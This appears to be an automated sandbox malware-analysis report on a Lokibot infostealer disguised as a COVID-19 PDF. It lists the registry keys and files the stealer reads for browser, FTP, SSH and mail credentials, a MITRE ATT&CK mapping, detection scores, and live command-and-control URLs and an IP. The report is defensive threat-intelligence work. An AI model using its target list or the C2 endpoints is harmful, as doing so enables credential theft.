                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_00406069 GetUserNameW, 6_2_00406069
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Lokibot
                Source: Yara match, File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Source: Yara match, File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: PopPassword, 6_2_0040D069
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: SmtpPassword, 6_2_0040D069
                Source: Yara match, File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY

                Mitre Att&ck Matrix

                The matrix is listed here by tactic (one line per column of the original). Digits in parentheses are the matched-signature counts shown as superscripts next to a technique in the original matrix; techniques without a count are unmatched matrix entries.

                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Scheduled Task/Job (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
                Persistence: Scheduled Task/Job (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                Privilege Escalation: Access Token Manipulation (1); Process Injection (11); Scheduled Task/Job (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (12); Software Packing (11); Masquerading (11); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (11)
                Credential Access: OS Credential Dumping (2); Input Capture (1); Credentials in Registry (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: Account Discovery (1); File and Directory Discovery (2); System Information Discovery (13); Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (31); System Owner/User Discovery (1); Network Service Scanning
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
                Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
                Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
                Impact: Modify System Partition; Device Lockout; Delete Device Data

                Behavior Graph

                The behavior graph itself is not reproduced here. Its legend distinguishes: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.

                Screenshots

                Screenshot thumbnails are not reproduced here (image: windows-stand).

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | 35% | Virustotal | -
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | 20% | ReversingLabs | Win32.Trojan.Wacatac
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | 100% | Joe Sandbox ML | -

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\qvDFOnW.exe | 100% | Joe Sandbox ML | -
                C:\Users\user\AppData\Roaming\qvDFOnW.exe | 35% | Virustotal | -
                C:\Users\user\AppData\Roaming\qvDFOnW.exe | 20% | ReversingLabs | Win32.Trojan.Wacatac

                Unpacked PE Files

                Source | Detection | Scanner | Label
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

                Domains

                No Antivirus matches

                URLs

                Source | Detection | Scanner | Label
                http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
                http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
                http://63.141.228.141/32.php/fn1ToJTMzu3Td | 11% | Virustotal | -
                http://63.141.228.141/32.php/fn1ToJTMzu3Td | 0% | Avira URL Cloud | safe
                http://www.tiro.com | 0% | URL Reputation | safe
                http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
                http://www.goodfont.co.kr | 0% | URL Reputation | safe
                http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
                http://www.fonts.combi | 0% | Avira URL Cloud | safe
                http://www.carterandcone.coml | 0% | URL Reputation | safe
                http://www.sajatypeworks.com | 0% | URL Reputation | safe
                http://www.typography.netD | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                http://fontfabrik.com | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM | 0% | Avira URL Cloud | safe
                http://www.fonts.comrsP | 0% | Avira URL Cloud | safe
                http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                http://www.sandoll.co.kr | 0% | URL Reputation | safe
                http://www.fonts.coms | 0% | Avira URL Cloud | safe
                http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                http://www.sakkal.com | 0% | URL Reputation | safe
                http://www.fonts.com8 | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
                http://63.141.228.141/32.php/fn1ToJTMzu3Td | true | 11% Virustotal; Avira URL Cloud: safe | unknown
                http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.apache.org/licenses/LICENSE-2.0 | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.fontbureau.com | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.fontbureau.com/designersG | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.fontbureau.com/designers/? | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.founder.com.cn/cn/bThe | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fontbureau.com/designers? | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.ibsensoftware.com/ | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.tiro.com | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fontbureau.com/designers | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmp | false | - | high
                http://www.goodfont.co.kr | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fonts.combi | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | false | - | high
                http://www.carterandcone.coml | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.sajatypeworks.com | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.typography.netD | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fontbureau.com/designers/cabarga.htmlN | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.founder.com.cn/cn/cThe | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.galapagosdesign.com/staff/dennis.htm | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://fontfabrik.com | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.founder.com.cn/cn | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fontbureau.com/designers/frere-jones.html | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                http://www.fonts.comrsP | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.jiyu-kobo.co.jp/ | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.galapagosdesign.com/DPlease | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fontbureau.com/designers8 | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.fonts.com | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | - | high
                http://www.sandoll.co.kr | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fonts.coms | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.urwpp.deDPlease | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.zhongyicts.com.cn | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | false | - | high
                http://www.sakkal.com | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.fonts.com8 | RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                Contacted IPs

                Public

                IP | Domain | Country | ASN | ASN Name | Malicious
                63.141.228.141 | unknown | United States | 33387 | NOCIXUS | true

                General Information

                Joe Sandbox Version: 32.0.0 Black Diamond
                Analysis ID: 442954
                Start date: 01.07.2021
                Start time: 14:35:31
                Joe Sandbox Product: CloudBasic
                Overall analysis duration: 0h 6m 10s
                Hypervisor based Inspection enabled: false
                Report type: full
                Sample file name: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of new started processes analysed: 8
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@6/6@0/1
                EGA Information: Failed
                HDC Information:
                • Successful, ratio: 17.8% (good quality ratio 16.4%)
                • Quality average: 73.5%
                • Quality standard deviation: 31.5%
                HCA Information:
                • Successful, ratio: 98%
                • Number of executed functions: 58
                • Number of non-executed functions: 10
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                Warnings:
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                • Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                Time | Type | Description
                14:36:25 | API Interceptor | 3x Sleep call for process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        Match | Associated Sample Name / URL | Detection | Context
                                        63.141.228.141 | IcTsYNL7h3.exe | malicious | 63.141.228.141/32.php/2fhJw7EqIe0Rj
                                        63.141.228.141 | CMA - customer Advisory - Container Charges.pdf.exe | malicious | 63.141.228.141/32.php/fn1ToJTMzu3Td
                                        63.141.228.141 | cotizaci#U00f3n.pdf.exe | malicious | 63.141.228.141/32.php/ocGTdeFq2SWdX
                                        63.141.228.141 | facturas y datos bancarios.PDF____________________________________.exe | malicious | 63.141.228.141/32.php/a1NQk98eWCWX2
                                        63.141.228.141 | http___103.89.90.94_hthp_wininit.exe | malicious | 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        63.141.228.141 | g0-core-ofr-gogreen-plus-infographic.pdf.exe | malicious | 63.141.228.141/32.php/fn1ToJTMzu3Td
                                        63.141.228.141 | datos bancarios y facturaa.pdf____________________________________________________.exe | malicious | 63.141.228.141/32.php/hGVMLp0uMVSWM
                                        63.141.228.141 | gunzipped.exe | malicious | 63.141.228.141/32.php/BMnWlQ62x3Dhz
                                        63.141.228.141 | SecuriteInfo.com.Trojan.Win32.Save.a.16492.exe | malicious | 63.141.228.141/32.php/auJMYiGBL7JHG
